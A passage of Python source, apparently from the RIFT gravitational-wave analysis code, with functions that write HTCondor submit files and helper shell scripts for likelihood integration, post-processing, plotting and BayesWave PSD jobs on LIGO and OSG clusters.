return ile_job, ile_sub_name
def write_ILE_sub_simple(tag='integrate', exe=None, log_dir=None, use_eos=False,simple_unique=False,ncopies=1,arg_str=None,request_memory=4096,request_gpu=False,request_disk=False,arg_vals=None, transfer_files=None,transfer_output_files=None,use_singularity=False,use_osg=False,use_simple_osg_requirements=False,singularity_image=None,use_cvmfs_frames=False,frames_dir=None,cache_file=None,fragile_hold=False,max_runtime_minutes=None,condor_commands=None,**kwargs):
"""
Write a submit file for launching jobs to marginalize the likelihood over intrinsic parameters.
Inputs:
Outputs:
- An instance of the CondorDAGJob that was generated for ILE
"""
if use_singularity and (singularity_image == None) :
print(" FAIL : Need to specify singularity_image to use singularity ")
sys.exit(0)
if use_singularity and (frames_dir == None) and (cache_file == None) :
print(" FAIL : Need to specify frames_dir or cache_file to use singularity (at present) ")
sys.exit(0)
if use_singularity and (transfer_files == None) :
print(" FAIL : Need to specify transfer_files to use singularity at present! (we will append the prescript; you should transfer any PSDs as well as the grid file ")
sys.exit(0)
exe = exe or which("integrate_likelihood_extrinsic")
frames_local = None
if use_singularity:
path_split = exe.split("/")
print((" Executable: name breakdown ", path_split, " from ", exe))
singularity_base_exe_path = "/opt/lscsoft/rift/MonteCarloMarginalizeCode/Code/" # should not hardcode this ...!
if 'SINGULARITY_BASE_EXE_DIR' in list(os.environ.keys()) :
singularity_base_exe_path = os.environ['SINGULARITY_BASE_EXE_DIR']
else:
# singularity_base_exe_path = "/opt/lscsoft/rift/MonteCarloMarginalizeCode/Code/" # should not hardcode this ...!
singularity_base_exe_path = "/usr/bin/" # should not hardcode this ...!
exe=singularity_base_exe_path + path_split[-1]
if not(frames_dir is None):
frames_local = frames_dir.split("/")[-1]
elif use_osg: # NOT using singularity!
if not(frames_dir is None):
frames_local = frames_dir.split("/")[-1]
path_split = exe.split("/")
exe=path_split[-1] # pull out basename
exe_here = 'my_wrapper.sh'
if transfer_files is None:
transfer_files = []
transfer_files += ['../my_wrapper.sh']
with open(exe_here,'w') as f:
f.write("#! /bin/bash \n")
f.write(r"""
#!/bin/bash
# Modules and scripts run directly from repository
# Note the repo and branch are self-referential ! Not a robust solution long-term
# Exit on failure:
# set -e
export INSTALL_DIR=research-projects-RIT
export ILE_DIR=${INSTALL_DIR}/MonteCarloMarginalizeCode/Code
export PATH=${PATH}:${ILE_DIR}
export PYTHONPATH=${PYTHONPATH}:${ILE_DIR}
export GW_SURROGATE=gwsurrogate
git clone https://git.ligo.org/richard-oshaughnessy/research-projects-RIT.git
pushd ${INSTALL_DIR}
git checkout temp-RIT-Tides-port_master-GPUIntegration
popd
ls
cat local.cache
echo Starting ...
./research-projects-RIT/MonteCarloMarginalizeCode/Code/""" + exe + " $@ \n")
os.system("chmod a+x "+exe_here)
exe = exe_here # update executable
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
#
# Add options en mass, by brute force
#
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
#
# Macro based options.
# - select EOS from list (done via macro)
# - pass spectral parameters
#
# ile_job.add_var_opt("event")
if use_eos:
ile_job.add_var_opt("using-eos")
requirements =[]
#
# Logging options
#
uniq_str = "$(macroevent)-$(cluster)-$(process)"
if simple_unique:
uniq_str = "$(macroevent)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
# Add lame initial argument
if "output_file" in kwargs and kwargs["output_file"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["output_file"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
del kwargs["output_file"]
if "save_samples" in kwargs and kwargs["save_samples"] is True:
ile_job.add_opt("save-samples", None)
del kwargs["save_samples"]
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
if cache_file:
ile_job.add_opt("cache-file",cache_file)
ile_job.add_var_opt("event")
if not use_osg:
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', str(request_memory))
if not(request_disk is False):
ile_job.add_condor_cmd('request_disk', str(request_disk))
nGPUs =0
if request_gpu:
nGPUs=1
ile_job.add_condor_cmd('request_GPUs', str(nGPUs))
if use_singularity:
# Compare to https://github.com/lscsoft/lalsuite/blob/master/lalinference/python/lalinference/lalinference_pipe_utils.py
ile_job.add_condor_cmd('request_CPUs', str(1))
ile_job.add_condor_cmd('transfer_executable', 'False')
ile_job.add_condor_cmd("+SingularityBindCVMFS", 'True')
ile_job.add_condor_cmd("+SingularityImage", '"' + singularity_image + '"')
requirements = []
requirements.append("HAS_SINGULARITY=?=TRUE")
# if not(use_simple_osg_requirements):
# requirements.append("HAS_CVMFS_LIGO_CONTAINERS=?=TRUE")
#ile_job.add_condor_cmd("requirements", ' (IS_GLIDEIN=?=True) && (HAS_LIGO_FRAMES=?=True) && (HAS_SINGULARITY=?=TRUE) && (HAS_CVMFS_LIGO_CONTAINERS=?=TRUE)')
if use_cvmfs_frames:
requirements.append("HAS_LIGO_FRAMES=?=TRUE")
ile_job.add_condor_cmd('use_x509userproxy','True')
if 'X509_USER_PROXY' in list(os.environ.keys()):
print(" Storing copy of X509 user proxy -- beware expiration! ")
cwd = os.getcwd()
fname_proxy = cwd +"/my_proxy" # this can get overwritten, that's fine - just renews, feature not bug
os.system("cp ${X509_USER_PROXY} " + fname_proxy)
# ile_job.add_condor_cmd('x509userproxy',os.environ['X509_USER_PROXY'])
ile_job.add_condor_cmd('x509userproxy',fname_proxy)
if use_osg:
if not(use_simple_osg_requirements):
requirements.append("IS_GLIDEIN=?=TRUE")
# avoid black-holing jobs to specific machines that consistently fail. Uses history attribute for ad
ile_job.add_condor_cmd('periodic_release','(HoldReasonCode == 45) && (HoldReasonSubCode == 0)')
ile_job.add_condor_cmd('job_machine_attrs','Machine')
ile_job.add_condor_cmd('job_machine_attrs_history_length','4')
# for indx in [1,2,3,4]:
# requirements.append("TARGET.GLIDEIN_ResourceName=!=MY.MachineAttrGLIDEIN_ResourceName{}".format(indx))
if "OSG_DESIRED_SITES" in os.environ:
ile_job.add_condor_cmd('+DESIRED_SITES',os.environ["OSG_DESIRED_SITES"])
if "OSG_UNDESIRED_SITES" in os.environ:
ile_job.add_condor_cmd('+UNDESIRED_SITES',os.environ["OSG_UNDESIRED_SITES"])
# Some options to automate restarts, acts on top of RETRY in dag
if fragile_hold:
ile_job.add_condor_cmd("periodic_release","(NumJobStarts < 5) && ((CurrentTime - EnteredCurrentStatus) > 600)")
ile_job.add_condor_cmd("on_exit_hold","(ExitBySignal == True) || (ExitCode != 0)")
if use_singularity or use_osg:
# Set up file transfer options
ile_job.add_condor_cmd("when_to_transfer_output",'ON_EXIT')
# Stream log info
ile_job.add_condor_cmd("stream_error",'True')
ile_job.add_condor_cmd("stream_output",'True')
# Create prescript command to set up local.cache, only if frames are needed
# if we have CVMFS frames, we should be copying local.cache over directly, with it already populated !
if not(frames_local is None) and not(use_cvmfs_frames): # should be required for singularity or osg
try:
lalapps_path2cache=os.environ['LALAPPS_PATH2CACHE']
except KeyError:
print("Variable LALAPPS_PATH2CACHE is unset, assume default lalapps_path2cache is appropriate")
lalapps_path2cache="lalapps_path2cache"
cmdname = 'ile_pre.sh'
if transfer_files is None:
transfer_files = []
transfer_files += ["../ile_pre.sh", frames_dir] # assuming default working directory setup
with open(cmdname,'w') as f:
f.write("#! /bin/bash -xe \n")
f.write( "ls "+frames_local+" | {lalapps_path2cache} 1> local.cache \n".format(lalapps_path2cache=lalapps_path2cache)) # Danger: need user to correctly specify local.cache directory
# Rewrite cache file to use relative paths, not a file:// operation
f.write(" cat local.cache | awk '{print $1, $2, $3, $4}' > local_stripped.cache \n")
f.write("for i in `ls " + frames_local + "`; do echo "+ frames_local + "/$i; done > base_paths.dat \n")
f.write("paste local_stripped.cache base_paths.dat > local_relative.cache \n")
f.write("cp local_relative.cache local.cache \n")
os.system("chmod a+x ile_pre.sh")
ile_job.add_condor_cmd('+PreCmd', '"ile_pre.sh"')
# if use_osg:
# ile_job.add_condor_cmd("+OpenScienceGrid",'True')
if use_cvmfs_frames:
transfer_files += ["../local.cache"]
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
# Write requirements
# From https://github.com/lscsoft/lalsuite/blob/master/lalinference/python/lalinference/lalinference_pipe_utils.py
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
if not transfer_files is None:
if not isinstance(transfer_files, list):
fname_str=transfer_files
else:
fname_str = ','.join(transfer_files)
fname_str=fname_str.strip()
ile_job.add_condor_cmd('transfer_input_files', fname_str)
ile_job.add_condor_cmd('should_transfer_files','YES')
if not transfer_output_files is None:
if not isinstance(transfer_output_files, list):
fname_str=transfer_output_files
else:
fname_str = ','.join(transfer_output_files)
fname_str=fname_str.strip()
ile_job.add_condor_cmd('transfer_output_files', fname_str)
# Periodic remove: kill jobs running longer than max runtime
# https://stackoverflow.com/questions/5900400/maximum-run-time-in-condor
if not(max_runtime_minutes is None):
remove_str = 'JobStatus =?= 2 && (CurrentTime - JobStartDate) > ( {})'.format(60*max_runtime_minutes)
ile_job.add_condor_cmd('periodic_remove', remove_str)
###
### SUGGESTION FROM STUART (for later)
# request_memory = ifthenelse( (LastHoldReasonCode=!=34 && LastHoldReasonCode=!=26), InitialRequestMemory, int(1.5 * NumJobStarts * MemoryUsage) )
# periodic_release = ((HoldReasonCode =?= 34) || (HoldReasonCode =?= 26))
# This will automatically release a job that is put on hold for using too much memory with a 50% increased memory request each tim.e
if condor_commands is not None:
for cmd, value in condor_commands.iteritems():
ile_job.add_condor_cmd(cmd, value)
return ile_job, ile_sub_name
def write_consolidate_sub_simple(tag='consolidate', exe=None, base=None,target=None,universe="vanilla",arg_str=None,log_dir=None, use_eos=False,ncopies=1,no_grid=False, **kwargs):
"""
Write a submit file for launching a consolidation job
util_ILEdagPostprocess.sh # suitable for ILE consolidation.
arg_str # add argument (used for NR postprocessing, to identify group)
"""
exe = exe or which("util_ILEdagPostprocess.sh")
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
# Add manual options for input, output
ile_job.add_arg(base) # what directory to load
ile_job.add_arg(target) # where to put the output (label), in CWD
#
# NO OPTIONS
#
# arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
# arg_str = arg_str.lstrip('-')
# ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
###
### SUGGESTION FROM STUART (for later)
# request_memory = ifthenelse( (LastHoldReasonCode=!=34 && LastHoldReasonCode=!=26), InitialRequestMemory, int(1.5 * NumJobStarts * MemoryUsage) )
# periodic_release = ((HoldReasonCode =?= 34) || (HoldReasonCode =?= 26))
# This will automatically release a job that is put on hold for using too much memory with a 50% increased memory request each tim.e
return ile_job, ile_sub_name
def write_unify_sub_simple(tag='unify', exe=None, base=None,target=None,universe="vanilla",arg_str=None,log_dir=None, use_eos=False,ncopies=1,no_grid=False, **kwargs):
"""
Write a submit file for launching a consolidation job
util_ILEdagPostprocess.sh # suitable for ILE consolidation.
arg_str # add argument (used for NR postprocessing, to identify group)
"""
exe = exe or which("util_CleanILE.py") # like cat, but properly accounts for *independent* duplicates. (Danger if identical). Also strips large errors
# Write unify.sh
# - problem of globbing inside condor commands
# - problem that *.composite files from intermediate results will generally NOT be present
cmdname ='unify.sh'
base_str = ''
if not (base is None):
base_str = ' ' + base +"/"
with open(cmdname,'w') as f:
f.write("#! /usr/bin/env bash\n")
f.write( "ls " + base_str+"*.composite 1>&2 \n") # write filenames being concatenated to stderr
f.write( exe + base_str+ "*.composite \n")
st = os.stat(cmdname)
import stat
os.chmod(cmdname, st.st_mode | stat.S_IEXEC)
ile_job = pipeline.CondorDAGJob(universe=universe, executable=base_str+cmdname) # force full prefix
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
# Add manual options for input, output
# ile_job.add_arg('*.composite') # what to do
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file(target)
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_convert_sub(tag='convert', exe=None, file_input=None,file_output=None,universe="vanilla",arg_str='',log_dir=None, use_eos=False,ncopies=1, no_grid=False,**kwargs):
"""
Write a submit file for launching a 'convert' job
convert_output_format_ile2inference
"""
exe = exe or which("convert_output_format_ile2inference") # like cat, but properly accounts for *independent* duplicates. (Danger if identical). Also strips large errors
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
if not(arg_str is None or len(arg_str)<2):
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
ile_job.add_arg(file_input)
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file(file_output)
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_test_sub(tag='converge', exe=None,samples_files=None, base=None,target=None,universe="target",arg_str=None,log_dir=None, use_eos=False,ncopies=1, **kwargs):
"""
Write a submit file for launching a convergence test job
"""
exe = exe or which("convergence_test_samples.py")
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# Add options for two parameter files
for name in samples_files:
# ile_job.add_opt("samples",name) # do not add in usual fashion, because otherwise the key's value is overwritten
ile_job.add_opt("samples " + name,'')
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file(target)
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_plot_sub(tag='converge', exe=None,samples_files=None, base=None,target=None,arg_str=None,log_dir=None, use_eos=False,ncopies=1, **kwargs):
"""
Write a submit file for launching a final plot. Note the user can in principle specify several samples (e.g., several iterations, if we want to diagnose them)
"""
exe = exe or which("plot_posterior_corner.py")
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# Add options for two parameter files
for name in samples_files:
# ile_job.add_opt("samples",name) # do not add in usual fashion, because otherwise the key's value is overwritten
ile_job.add_opt("posterior-file " + name,'')
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file(target)
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_init_sub(tag='gridinit', exe=None,arg_str=None,log_dir=None, use_eos=False,ncopies=1, **kwargs):
"""
Write a submit file for launching a grid initialization job.
Note this routine MUST create whatever files are needed by the ILE iteration
"""
exe = exe or which("util_ManualOverlapGrid.py")
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_psd_sub_BW_monoblock(tag='PSD_BW_mono', exe=None, log_dir=None, ncopies=1,arg_str=None,request_memory=4096,arg_vals=None, transfer_files=None,transfer_output_files=None,use_singularity=False,use_osg=False,singularity_image=None,frames_dir=None,cache_file=None,psd_length=4,srate=4096,data_start_time=None,event_time=None,universe='local',no_grid=False,**kwargs):
"""
Write a submit file for constructing the PSD using BW
Modern argument syntax for BW
Note that *all ifo-specific results must be set outside this loop*, to work sensibly, and passed as an argument
Inputs:
- channel_dict['H1'] = [channel_name, flow_ifo]
Outputs:
- An instance of the CondorDAGJob that was generated for BW
"""
exe = exe or which("BayesWave")
if exe is None:
print(" BayesWave not available, hard fail ")
sys.exit(0)
frames_local = None
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
requirements =[]
#
# Logging options
#
uniq_str = "$(macroevent)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
#
# Loop over IFOs
# You should only have one, in the workflow for which this is intended
# Problem:
ile_job.add_arg("$(macroargument0)")
#
# Add mandatory options
ile_job.add_opt('Niter', '1000100')
ile_job.add_opt('Nchain', '20')
ile_job.add_opt('Dmax', '200') # limit number of dimensions in model
ile_job.add_opt('resume', '')
ile_job.add_opt('progress', '')
ile_job.add_opt('checkpoint', '')
ile_job.add_opt('bayesLine', '')
ile_job.add_opt('cleanOnly', '')
ile_job.add_opt('updateGeocenterPSD', '')
ile_job.add_opt('dataseed', '1234') # make reproducible
ile_job.add_opt('trigtime', str(event_time))
ile_job.add_opt('psdstart', str(event_time-(psd_length-2)))
ile_job.add_opt('segment-start', str(event_time-(psd_length-2)))
ile_job.add_opt('seglen', str(psd_length))
ile_job.add_opt('psdlength', str(psd_length))
ile_job.add_opt('srate', str(srate))
ile_job.add_opt('outputDir', 'output_$(ifo)')
# Add lame initial argument
if "output_file" in kwargs and kwargs["output_file"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["output_file"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
del kwargs["output_file"]
if "save_samples" in kwargs and kwargs["save_samples"] is True:
ile_job.add_opt("save-samples", None)
del kwargs["save_samples"]
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', str(request_memory))
# Write requirements
# From https://github.com/lscsoft/lalsuite/blob/master/lalinference/python/lalinference/lalinference_pipe_utils.py
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_psd_sub_BW_step1(tag='PSD_BW_post', exe=None, log_dir=None, ncopies=1,arg_str=None,request_memory=4096,arg_vals=None, transfer_files=None,transfer_output_files=None,use_singularity=False,use_osg=False,singularity_image=None,frames_dir=None,cache_file=None,channel_dict=None,psd_length=4,srate=4096,data_start_time=None,event_time=None,**kwargs):
"""
Write a submit file for launching jobs to marginalize the likelihood over intrinsic parameters.
Inputs:
- channel_dict['H1'] = [channel_name, flow_ifo]
Outputs:
- An instance of the CondorDAGJob that was generated for ILE
"""
exe = exe or which("BayesWavePost")
if exe is None:
print(" BayesWavePost not available, hard fail ")
import sys
sys.exit(0)
frames_local = None
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
requirements =[]
#
# Logging options
#
uniq_str = "$(macroevent)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
#
# Add mandatory options
ile_job.add_opt('checkpoint', '')
ile_job.add_opt('bayesLine', '')
ile_job.add_opt('cleanOnly', '')
ile_job.add_opt('updateGeocenterPSD', '')
ile_job.add_opt('Nchain', '20')
ile_job.add_opt('Niter', '4000000')
ile_job.add_opt('Nbayesline', '2000')
ile_job.add_opt('dataseed', '1234') # make reproducible
ile_job.add_opt('trigtime', str(event_time))
ile_job.add_opt('psdstart', str(event_time-(psd_length-2)))
ile_job.add_opt('segment-start', str(event_time-(psd_length-2)))
ile_job.add_opt('seglen', str(psd_length))
ile_job.add_opt('srate', str(srate))
#
# Loop over IFOs
# Not needed, can do one job per PSD
# ile_job.add_opt("ifo","$(ifo)")
# ile_job.add_opt("$(ifo)-cache",cache_file)
for ifo in channel_dict:
channel_name, channel_flow = channel_dict[ifo]
ile_job.add_arg("--ifo "+ ifo) # need to prevent overwriting!
ile_job.add_opt(ifo+"-channel", ifo+":"+channel_name)
ile_job.add_opt(ifo+"-cache", cache_file)
ile_job.add_opt(ifo+"-flow", str(channel_flow))
# Add lame initial argument
if "output_file" in kwargs and kwargs["output_file"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["output_file"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
del kwargs["output_file"]
if "save_samples" in kwargs and kwargs["save_samples"] is True:
ile_job.add_opt("save-samples", None)
del kwargs["save_samples"]
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', str(request_memory))
# Write requirements
# From https://github.com/lscsoft/lalsuite/blob/master/lalinference/python/lalinference/lalinference_pipe_utils.py
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
